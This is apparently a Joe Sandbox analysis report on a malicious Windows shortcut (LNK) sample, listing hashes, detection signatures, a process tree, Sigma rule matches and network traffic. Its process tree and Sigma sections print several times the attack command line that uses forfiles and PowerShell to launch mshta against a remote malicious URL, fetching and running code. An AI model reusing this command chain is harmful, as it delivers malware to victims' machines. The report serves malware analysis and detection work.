Edit tour

Windows Analysis Report
8t6beMY1wO.lnk

Overview

General Information

Sample name:	8t6beMY1wO.lnk renamed because original name is a hash value
Original sample name:	4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb.lnk
Analysis ID:	1512349
MD5:	50e161c24d2f447015cae82cccaf4885
SHA1:	f4f7fa40c75d74e22df41b1916893b514c54e384
SHA256:	4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb
Tags:	62-133-61-56lnkPeakLight-Related
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

AI detected suspicious sample

Sigma detected: Potentially Suspicious PowerShell Child Processes

Windows shortcut file (LNK) contains suspicious command line arguments

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

forfiles.exe (PID: 2852 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)

conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5908 cmdline: . mshta https://vidstreemz.b-cdn.net/nexto MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 2216 cmdline: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

svchost.exe (PID: 5612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto, CommandLine: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . mshta https://vidstreemz.b-cdn.net/nexto, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto, ProcessId: 2216, ProcessName: mshta.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . mshta https://vidstreemz.b-cdn.net/nexto, CommandLine: . mshta https://vidstreemz.b-cdn.net/nexto, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 2852, ParentProcessName: forfiles.exe, ProcessCommandLine: . mshta https://vidstreemz.b-cdn.net/nexto, ProcessId: 5908, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5612, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://vidstreemz.b-cdn.net/nexto...	Avira URL Cloud: Label: malware
Source: https://vidstreemz.b-cdn.net/nexto;	Avira URL Cloud: Label: malware
Source: https://vidstreemz.b-cdn.net/nexto	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: vidstreemz.b-cdn.net

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for submitted file

Source: 8t6beMY1wO.lnk	Virustotal: Detection: 33%			Perma Link
Source: 8t6beMY1wO.lnk	ReversingLabs: Detection: 45%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: unknown	HTTPS traffic detected: 138.199.36.7:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.247.37:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.247.39:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.236.104:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.8:49709 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 169.150.236.104 169.150.236.104
Source: Joe Sandbox View	IP Address: 169.150.247.39 169.150.247.39
Source: Joe Sandbox View	IP Address: 169.150.247.36 169.150.247.36

Source: Joe Sandbox View

ASN Name: ORANGE-BUSINESS-SERVICES-IPSN-ASNFR ORANGE-BUSINESS-SERVICES-IPSN-ASNFR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /nexto HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vidstreemz.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/landingpage/css/unconfigured.css HTTP/1.1Accept: /Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v2/images/bunnynet-logo.svg HTTP/1.1Accept: /Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunny.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: fonts.bunny.net
Source: global traffic	HTTP traffic detected: GET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1Accept: /Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.bunny.netConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /nexto HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vidstreemz.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/landingpage/css/unconfigured.css HTTP/1.1Accept: /Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v2/images/bunnynet-logo.svg HTTP/1.1Accept: /Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunny.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: fonts.bunny.net
Source: global traffic	HTTP traffic detected: GET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1Accept: /Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.bunny.netConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: vidstreemz.b-cdn.net
Source: global traffic	DNS traffic detected: DNS query: fonts.bunny.net
Source: global traffic	DNS traffic detected: DNS query: bunnycdn.b-cdn.net
Source: global traffic	DNS traffic detected: DNS query: bunny.net
Source: global traffic	DNS traffic detected: DNS query: bunnycdn.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 17 Sep 2024 07:23:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: BunnyCDN-DE1-1047CDN-RequestId: dadb726982688969a757bb31ab82be38

Source: svchost.exe, 00000006.00000002.2701659030.000001BD6B490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fonts.bunny.net/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fonts.bunny.net/css?family=Rubik:300
Source: mshta.exe, 00000004.00000002.2700827513.00000279E78AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698362018.00000083998FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E78B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E785C000.00000004.00000020.00020000.00000000.sdmp, il-bg-black-flower[1].svg.4.dr	String found in binary or memory: http://www.bohemiancoding.com/sketch
Source: mshta.exe, 00000004.00000002.2699958803.00000279E73E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net(
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/%z
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/(
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/.
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/6
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/D
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/L
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/O
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/P
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/S
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/X
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/Z
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/l
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/ptI
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/t
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg...
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgb(
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.css
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgx
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunny.net/x
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/L
Source: mshta.exe, 00000004.00000002.2699958803.00000279E73E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssnt
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/2
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7852000.00000004.00000020.00020000.00000000.sdmp, unconfigured[1].css.4.dr	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)M
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...-
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...4B
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg7X
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgT_
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgUXo
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgq
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgss
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bunnycdn.com/~
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/css?family=Rubik:300
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/p
Source: mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-aW
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyr
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrilli
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normalformat(
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normw
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)
